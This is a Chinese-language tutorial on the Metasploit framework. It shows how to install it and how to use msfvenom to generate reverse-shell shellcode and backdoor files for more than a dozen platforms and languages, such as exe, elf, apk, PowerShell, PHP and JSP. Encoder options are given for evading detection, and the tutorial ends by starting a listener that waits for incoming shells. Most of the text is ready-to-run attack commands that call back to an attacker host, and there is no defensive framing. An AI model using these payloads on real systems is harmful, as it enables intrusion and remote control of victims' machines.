采用metasploit框架生成反弹shellcode

采用MSF框架生成反弹shellcode

1. metasploit框架安装

安装命令如下：

$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
$ chmod 755 msfinstall
$ ./msfinstall

安装后可用命令如下

其中msfvenom可用于生成shellcode或可执行文件。参数介绍如下：

Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads 指定payload的功能
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list) 
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use 
        --platform      <platform>   The platform of the payload
        --help-platforms             List available platforms
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

以下为msfvenom部分参数中文说明及示例

1. -p 指定payload的功能

  --payload:确定payload类型

  --payload-options:查看对应payload类型子选项

例：
 msfvenom -p linux/x86/exec CMD=/bin/sh   执行shell
--------------------------------------------------------------------------------------------
2. -a 指定处理器架构和操作平台

--arch：指定处理器架构
--platform：指定平台
例：
msfvenom -a x86 --platform linux
--------------------------------------------------------------------------------------------
3. -f 指定输出格式

例：
msfvenom -a x86 --platform linux -f python payload以python语言格式输出
--------------------------------------------------------------------------------------------
4. -b 指定规避字符串（以字符的16进制表示）

例：
msfvenom -a x86 --platform linux -b "\x00\x0a"  生成的payload中不允许出现'\x00'和'\x0a'
--------------------------------------------------------------------------------------------
5. -e 指定编码器

例：
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -e x86/alpha_mixed 
--------------------------------------------------------------------------------------------
6. -n 在payload前填充Nop Sled

--nopsled:指定rop类型
 <length>：指定rop长度
例：
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -n x86/single_byte 120
--------------------------------------------------------------------------------------------
7. -v 指定payload名字
payload默认叫buf
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -f python
  No encoder or badchars specified, outputting raw payload
  Payload size: 38 bytes
  Final size of python file: 192 bytes
  buf = ""
  buf += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
  buf += "\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03"
  buf += "\x00\x00\x00\x73\x68\x00\x57\x53\x89\xe1\xcd\x80"

例：
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -v payload -f python
  No encoder or badchars specified, outputting raw payload
  Payload size: 38 bytes
  Final size of python file: 222 bytes
  payload = ""
  payload += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68"
  payload += "\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52"
  payload += "\xe8\x03\x00\x00\x00\x73\x68\x00\x57\x53\x89\xe1"
  payload += "\xcd\x80"

2. MSF 生成各种后门

Windows: 生成Windows后门.

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe

Linux:

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f elf -o payload.elf

MAC OS: 生成苹果MAC后门.

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f macho -o payload.macho

Android: 生成安卓后门,需要签名

msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f apk -o payload.apk

PowerShell: 生成PowerShell.

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >>
shell.php

ASP.net:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f aspx -o payload.aspx

JSP:

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f raw -o payload.jsp

War:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f raw -o payload.war

Node.js:

msfvenom -p nodejs/shell_reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f raw -o payload.js

Python:

msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.py

Perl:

msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl

Ruby:

msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb

Lua:

msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua

MSF 生成ShellCode

Windows ShellCode:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

linux shellcode:

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

mac shellcode:

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

MFS控制主机,启动侦听程序

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > set lhost 192.168.1.7
msf5 exploit(multi/handler) > set lport 8888
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.7:8888